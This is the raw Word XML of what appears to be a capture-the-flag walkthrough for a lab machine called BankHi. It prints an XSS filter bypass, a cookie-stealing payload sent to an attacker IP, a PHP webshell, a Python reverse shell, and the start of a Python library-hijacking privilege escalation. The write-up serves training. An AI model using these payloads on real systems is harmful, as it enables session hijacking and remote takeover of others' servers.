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w:t>
      </w:r>
      <w:hyperlink r:id="rId7">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">BankHi</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> machine. If you require support, please open a ticket in the </w:t>
      </w:r>
      <w:hyperlink r:id="rId8">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kbuzq9yqhdgc"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fuse6kylt5e"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2019300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="79"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ijfkq7kqlimj" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ports:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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22 - SSH</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80 - HTTP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>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111 - RPCBIND</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000010">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="280" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.m51hrvc906qx" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Site:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>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24200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="62"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When accessing port 80, we can register at:</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">About Us → Bug Bounty Program → Login Page.</w:t>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71800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="85"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registering, we gain access to the reports page, where we can see that some reports have already been submitted regarding certain vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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51100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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the upper-right corner, there is a button to submit a report.</w:t>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860800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5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 will test an XSS vulnerability. It’s not very common in CTFs, but if the admin is reviewing the reports, we might be able to send a malicious payload to steal the session cookie.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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327400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="73"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viewing the source code, we can see that it removed our </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">script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tag and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">alert</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, so there is a filter in place. We can also find our first flag here.</w:t>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51000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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Knowing this, we can attempt a simple bypass:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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&lt;scrscriptipt&gt;alealertrt(0)&lt;/scrscriptipt&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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36900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="93" name="image42.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image42.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>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submitting the payload, we can see our alert on the screen, which confirms the application is vulnerable to XSS =)</w:t>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632200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="91" name="image38.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image38.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>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now craft a malicious XSS Session Hijacking payload to steal the admin user’s session:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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&lt;scrscriptipt&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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new Image().src='http://&lt;IP&gt;/'+(docdocumentument.cookcookieie);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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&lt;/scscriptript&gt;</w:t>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start a Netcat listener to receive the request.</w:t>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27300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="88" name="image36.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image36.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>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submit our report with the malicious payload.</w:t>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238500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="70"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Checking Netcat, we receive a request containing a token.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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30400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="6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now add this token to our session.</w:t>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36800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="71"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943600" cy="2336800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After refreshing the page, we get our second flag and an upload field.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002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771900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="95" name="image37.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image37.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>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upload a webshell:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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&lt;?php system($_GET['cmd']); ?&gt;</w:t>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32000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="54"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uploading the webshell, we do not know which directory it was saved in, so we can perform directory fuzzing to locate it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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44700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="72"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found the directory → </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/uploads</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54300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="76"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now have RCE. I will check whether Python is installed on the server so we can obtain a reverse shell using Python.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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52700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="53"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Python is available. Below is the reverse shell payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000039">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Online Reverse Shell Generator:</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:hyperlink r:id="rId27">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.revshells.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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Pr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="5562600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="89"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59436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3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python3 -c 'import socket,subprocess,os;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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s.connect(("&lt;IP-VPN&gt;",&lt;PORT&gt;));</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003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os.dup2(s.fileno(),0);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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os.dup2(s.fileno(),1);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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os.dup2(s.fileno(),2);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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pty; pty.spawn("bash")'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000043">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4">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46">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2222500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="92" name="image41.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image41.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>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send our reverse shell payload.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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78000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="68"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5943600" cy="1778000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After sending it, we receive the connection =)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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71700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="83" name="image40.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image40.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>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mw6vmc2fadmz" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Shell tty</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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a simple shell to fully interactive TTYs:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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python3 -c "import pty;pty.spawn('/bin/bash')"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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4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4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Enter</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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5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11400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="77"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Navigating to the root directory, we find a file →</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welcome.txt</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Inside this file, we find the password for user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ronald</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5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65400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="74"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logging in as ronald, we can retrieve our third flag from the user’s home directory =)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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65300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="58"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After obtaining the third flag, we execute </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo -l</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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execute the script </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bingo.py</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> as user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">leia</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> without needing to provide her password.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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57400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="69"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jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_heading=h.8ziz2urwkhb4" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Python Library Hijacking -</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Python PATH</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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vulnerability is based on how Python searches for libraries using the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PYTHONPATH</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> environment variable. This variable contains a list of directories where Python searches for imported modules.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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65300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="94" name="image39.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image39.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36"/>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the script imports the module </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">socketserver</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we will first create a malicious module file with the same name. Then, using the ability to modify the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PYTHONPATH</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environment variable, we will include our malicious module file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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malicious module will contain a payload that gives us a shell as user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
